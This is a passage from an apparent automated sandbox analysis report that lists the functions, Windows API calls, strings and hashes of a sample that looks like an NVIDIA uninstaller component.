                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FormatLocalMessageTime_fputs_sprintf$DebugErrorFreeLastMutexObjectOutputReleaseSingleStringWait__output_l_fprintf
                                  • String ID: %s%s$%s Error(%li)$CommandClass::ShowLastError
                                  • API String ID: 1966981115-2484366330
                                  • Opcode ID: 1d11748fcb0c4b8f9c94ad4c83002a2468fac9d83a485c68f2e19f11a2514907
                                  • Instruction ID: 98a4c66635103757f4c5d90b18bae06a0564441797562216ccfa199704bdf7c5
                                  • Opcode Fuzzy Hash: 1d11748fcb0c4b8f9c94ad4c83002a2468fac9d83a485c68f2e19f11a2514907
                                  • Instruction Fuzzy Hash: 1C11AB72300700BBD324DB54DC46FEFB7A8EB98745F40891EB645921C1EB74A554CBE6
                                  Function 00407FC0 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetPrivateProfileStringA.KERNEL32(Version,Class,(error),?,00000080,?), ref: 0040800A
                                  • GetPrivateProfileStringA.KERNEL32(Version,Provider,(error),?,00000080,?), ref: 00408029
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$PrivateProfileTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleWait__mbsicmp_l_fprintf
                                  • String ID: %NVidia%$(error)$Class$Display$Provider$UninstCommandClass::IsNvDisplayInf$Version
                                  • API String ID: 4135434718-2900725535
                                  • Opcode ID: 52bc5b012bbe5feeddd9a2d6ce780c4bf5da6c727d802a42b4c098c3a660292d
                                  • Instruction ID: 2ca9689c1e262c72aafdbaccc39778859b66c77a81ed6a24b5e3caec5619c15d
                                  • Opcode Fuzzy Hash: 52bc5b012bbe5feeddd9a2d6ce780c4bf5da6c727d802a42b4c098c3a660292d
                                  • Instruction Fuzzy Hash: 0211C2B5B4034067E620E766DC47FEB7694BFA4784F00443EF984621C2E6BDA448C7AE
                                  Function 00407A40 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 213COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407BBF
                                  • CoInitialize.OLE32(00000000), ref: 00407BCA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • CreateShortcut: invalid number of arguments, xrefs: 00407A81
                                  • UninstCommandClass::CreateShortcut, xrefs: 00407A5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CreateDebugDirectoryFormatInitializeLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CreateShortcut: invalid number of arguments$UninstCommandClass::CreateShortcut
                                  • API String ID: 170011988-203580069
                                  • Opcode ID: bddf0185f60c7cc371ec589080dce0e007a705512886e32c1518adc8baa15136
                                  • Instruction ID: 72563601ff5a91138ee463545765219fc5e2ffcf66d2a1534b320dc4e2e76495
                                  • Opcode Fuzzy Hash: bddf0185f60c7cc371ec589080dce0e007a705512886e32c1518adc8baa15136
                                  • Instruction Fuzzy Hash: 02716D75608301AFC310DB28D891BABB7E5AFC8314F14892DF959A7391D734F905CBA6
                                  Function 00401A50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00401ACA
                                  • SetLastError.KERNEL32(00000000), ref: 00401ADA
                                  • GetLastError.KERNEL32 ref: 00401AE6
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00401B1C
                                  • GetLastError.KERNEL32 ref: 00401B22
                                  • FindClose.KERNEL32(00000000), ref: 00401B2A
                                  Strings
                                  • CommandClass::EnumFiles, xrefs: 00401A77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ErrorFindLast$FileTime_fputs$CloseDebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: CommandClass::EnumFiles
                                  • API String ID: 1221427077-876897932
                                  • Opcode ID: 17ff3337f41760794aa28b3fb4c9f9a9ec2d9cee4e987ee76e076f35f9c71f2a
                                  • Instruction ID: fac88285da1a606cb5ca6f33d8c751f1491a05cc254046272bf09f2927cffa5a
                                  • Opcode Fuzzy Hash: 17ff3337f41760794aa28b3fb4c9f9a9ec2d9cee4e987ee76e076f35f9c71f2a
                                  • Instruction Fuzzy Hash: 222174321087409FC320DB68DD95AEF7BE4AFD9305F00492DF58A97361EB349908CB96
                                  Function 00404180 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LookupPrivilegeValueA.ADVAPI32 ref: 004041A4
                                  • GetCurrentProcess.KERNEL32(00000020,00000000), ref: 004041BF
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004041C6
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 004041E1
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000010,00000000,00000000), ref: 004041EB
                                  • GetLastError.KERNEL32(?,00000000,00000001,00000010,00000000,00000000), ref: 004041F1
                                  Strings
                                  • UninstCommandClass::NvEnableTokenPrivilege, xrefs: 00404183
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProcessTimeToken_fputs$AdjustCloseCurrentDebugErrorFormatHandleLastLocalLookupMutexObjectOpenOutputPrivilegePrivilegesReleaseSingleStringValueWait_fprintf
                                  • String ID: UninstCommandClass::NvEnableTokenPrivilege
                                  • API String ID: 3092253808-3895378903
                                  • Opcode ID: 4670426cac2fe7c6c0c0196e73a97a1693be51439bb9d976c301965b203cb191
                                  • Instruction ID: 7ab7daa8431ee1f8187e6cd71065e700b29adbbce0c0792880465a7fabf7e16a
                                  • Opcode Fuzzy Hash: 4670426cac2fe7c6c0c0196e73a97a1693be51439bb9d976c301965b203cb191
                                  • Instruction Fuzzy Hash: E60144B0644301ABD310EF64CC4AF9B7BA8FB84701F14C929F591D61A0D774D94887A6
                                  Function 00407730 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00407769
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0040777B
                                  • Module32First.KERNEL32 ref: 00407799
                                  • CloseHandle.KERNEL32(00000000), ref: 004077BE
                                  Strings
                                  • UninstCommandClass::GetProcessModule, xrefs: 0040774E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseCreateDebugFirstFormatHandleLocalModule32MutexObjectOutputReleaseSingleSnapshotStringToolhelp32Wait_fprintf_memset
                                  • String ID: UninstCommandClass::GetProcessModule
                                  • API String ID: 2465373681-922176341
                                  • Opcode ID: 9718ed98a6a4c9b9e592de8180d2689cc63cc8b61b6a9219d3c4ffea88374871
                                  • Instruction ID: 09fc4999a80a099d9463567efee23382dab9352c641e14a0b91ba2d952bc89c9
                                  • Opcode Fuzzy Hash: 9718ed98a6a4c9b9e592de8180d2689cc63cc8b61b6a9219d3c4ffea88374871
                                  • Instruction Fuzzy Hash: D901CC716043006BD320EBA5DC89EAF77D8EFD8354F44092EF555932C1DB38690587AB
                                  Function 0040C042 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0041133B
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00411350
                                  • UnhandledExceptionFilter.KERNEL32(004216C4), ref: 0041135B
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00411377
                                  • TerminateProcess.KERNEL32(00000000), ref: 0041137E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 69d3541adcc882bf132c78f22a1bf283ce2c2708e70e8f3eea6b2b149dd52042
                                  • Instruction ID: d0e19ec7361a8797260ffc709ea3df914eb779762e176d43a2dfc101960c7177
                                  • Opcode Fuzzy Hash: 69d3541adcc882bf132c78f22a1bf283ce2c2708e70e8f3eea6b2b149dd52042
                                  • Instruction Fuzzy Hash: DE21C3B4610344DFD720DF64EE846887BB4BB08345F92507AED08962B0E7B859A78F4E
                                  Function 00403A30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403B80: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\NVIDIA Corporation\Installer,00000000,00000001,?), ref: 00403BAD
                                    • Part of subcall function 00403B80: RegQueryValueExA.ADVAPI32 ref: 00403BE5
                                    • Part of subcall function 00403B80: _memset.LIBCMT ref: 00403BF8
                                    • Part of subcall function 00403B80: RegQueryValueExA.ADVAPI32(?,LogPath,00000000,00000000,?,?), ref: 00403C25
                                    • Part of subcall function 00403B80: PathIsRelativeA.SHLWAPI(?), ref: 00403C30
                                    • Part of subcall function 00403B80: RegCloseKey.ADVAPI32(?), ref: 00403C53
                                    • Part of subcall function 00403B80: CreateMutexA.KERNEL32(00000000,00000000,Global\NVInstallerLogFile), ref: 00403C73
                                    • Part of subcall function 00403B80: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403C89
                                    • Part of subcall function 00403B80: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000008,NVInstallerLogSharedMemory), ref: 00403C9C
                                    • Part of subcall function 00403B80: ReleaseMutex.KERNEL32(?), ref: 00403CB1
                                    • Part of subcall function 00403B80: CloseHandle.KERNEL32(?), ref: 00403CBE
                                    • Part of subcall function 004053F0: GetVersionExA.KERNEL32(00000000), ref: 0040544C
                                  • LoadStringA.USER32(?,00000009,?,00000100), ref: 00403A98
                                  • LoadStringA.USER32(?,00000001,?,00000080), ref: 00403AAA
                                  • MessageBoxA.USER32(00000000,?,?,00000000), ref: 00403AC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseCreateLoadMutexQueryStringValue$FileHandleMappingMessageObjectOpenPathRelativeReleaseSingleVersionWait_memset
                                  • String ID: UnInstaller
                                  • API String ID: 1444618915-1707990285
                                  • Opcode ID: 42080dd58d24130139bef8cdfe76d778fd589072c7cd43c4633c4b1e23122540
                                  • Instruction ID: c85bfe5b000439fac7031c587e884d56bc3e528d9591eb6319320c9c715a2ffb
                                  • Opcode Fuzzy Hash: 42080dd58d24130139bef8cdfe76d778fd589072c7cd43c4633c4b1e23122540
                                  • Instruction Fuzzy Hash: 0A218071208240AAD224EB65DC56BEB77A8FFC4304F50852EF589971C1EFB8A504CBDA
                                  Function 00407CD0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00407CF0
                                  • DeviceIoControl.KERNEL32(00000000,00041018,00000000,00000000,?,00000008,?,00000000), ref: 00407D21
                                  • CloseHandle.KERNEL32(00000000), ref: 00407D2A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseControlCreateDebugDeviceFileFormatHandleLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: GetDriveSCSIAddress
                                  • API String ID: 3234933748-527886275
                                  • Opcode ID: 71925fa279a85dda880005e78cdda1d9abb8d960348d80cdd745e99ffeb868e7
                                  • Instruction ID: 67a817007a8cea9c4c90015ff023be56a693fd8fddb7151cd6217a53b4769b84
                                  • Opcode Fuzzy Hash: 71925fa279a85dda880005e78cdda1d9abb8d960348d80cdd745e99ffeb868e7
                                  • Instruction Fuzzy Hash: 7EF090713803103AE2205B68EC0EF866798DB85B62F208526F701EA1C0C6F0690483A9
                                  Function 022F5011 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 27350560abe260e57fde0ad58594dca5c90defaaa907b3b186303e3d46297d56
                                  • Instruction ID: 0579c25e085e1512329c1ddb5f3af8ffe13fa67cb51483bf55b12c7ce0f1ae6d
                                  • Opcode Fuzzy Hash: 27350560abe260e57fde0ad58594dca5c90defaaa907b3b186303e3d46297d56
                                  • Instruction Fuzzy Hash: 0B223B75E2024A8FDB14CFA4C891BEDFBB2FF48305F548269D9156B789C335A852CB50
